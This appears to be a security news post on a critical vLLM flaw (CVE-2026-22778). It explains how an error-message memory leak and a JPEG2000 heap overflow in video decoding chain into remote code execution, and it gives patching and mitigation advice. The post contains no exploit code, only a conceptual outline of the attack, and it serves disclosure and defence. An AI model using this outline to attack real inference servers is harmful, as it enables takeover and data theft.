Critical vLLM Vulnerability Lets Attackers Take Over AI Servers With a Video Link

If you’re running vLLM to serve multimodal AI models, stop what you’re doing and patch. A critical vulnerability disclosed on February 2 allows unauthenticated attackers to take over your server by sending a single malicious video URL.

The flaw (CVE-2026-22778, CVSS 9.8) affects versions 0.8.3 through 0.14.0 of vLLM - the high-throughput inference engine that downloads over 3 million times monthly. Anyone serving video-capable multimodal models is at risk.

How the Attack Works

This is a chained exploit combining two weaknesses:

Step 1: Information leak. When you submit an invalid image to a vLLM multimodal endpoint, the Python Imaging Library throws an error. In vulnerable versions, vLLM returns that error directly to the client - including heap memory addresses. This leaks enough information to defeat Address Space Layout Randomization (ASLR), reducing what would be 4 billion guesses down to about 8.

Step 2: Heap overflow. The real damage comes from OpenCV’s bundled FFmpeg JPEG2000 decoder. When vLLM processes video from an attacker-controlled URL, a malicious “cdef” (channel definition) box can remap color channels in a way that overflows the buffer. A 150×64 pixel frame generates a 7,200-byte overflow - enough to overwrite function pointers and execute arbitrary code.

The attacker just needs to send two API requests: one to leak the memory address, another to trigger the overflow. No authentication required in vLLM’s default configuration.

What’s at Stake

Successful exploitation gives attackers:

Your AI models: Proprietary models, fine-tuned weights, custom training data
User prompts: Every conversation passing through your inference server
Infrastructure access: Lateral movement through your network, especially dangerous in GPU clusters
Compute resources: Cryptomining, botnet participation, or attacking others from your infrastructure

This is particularly concerning for organizations running vLLM at scale. The library is popular precisely because it handles high throughput efficiently - which means compromised servers may be processing thousands of user requests.

Who’s Affected

You’re vulnerable if you’re running vLLM versions 0.8.3 through 0.14.0 with multimodal video model support enabled. Common affected setups include:

Self-hosted multimodal inference APIs
Internal AI services using vision-language models
Development environments with video model endpoints exposed
Cloud GPU instances serving multimodal models

If you’re only running text-based models, you’re not affected. The vulnerability specifically requires video processing functionality.

What You Should Do

Immediate action: Upgrade to vLLM 0.14.1 or later. The patched version fixes both the information leak and the underlying heap overflow.

pip install --upgrade vllm>=0.14.1

If you can’t patch immediately:

Disable video model endpoints
Restrict network access so vLLM APIs aren’t exposed to untrusted networks
Deploy behind authentication (which you should have been doing anyway)

Audit your exposure: Check if your vLLM endpoints have been accessible from the internet. While no active exploitation has been confirmed yet, a public proof-of-concept exists in the GitHub Security Advisory.

The Bigger Picture

This vulnerability highlights a growing problem: AI inference infrastructure inherits security issues from its dependencies. The actual bug isn’t in vLLM’s code - it’s in OpenCV’s FFmpeg JPEG2000 decoder. But because vLLM uses OpenCV to process video, the vulnerability cascades up into a critical RCE in AI infrastructure.

As organizations rush to deploy multimodal AI, they’re inheriting complex dependency chains. Video processing, image decoding, audio handling - each adds attack surface. And because AI inference servers often have access to sensitive models and user data, they’re high-value targets.

The security community is paying attention. OX Security identified vulnerable customers and instructed them to update immediately. Orca Security published detailed technical analysis within days of disclosure.

If you’re running any AI inference infrastructure, this is a reminder to treat it like the production system it is: patch promptly, restrict network access, and don’t assume default configurations are secure.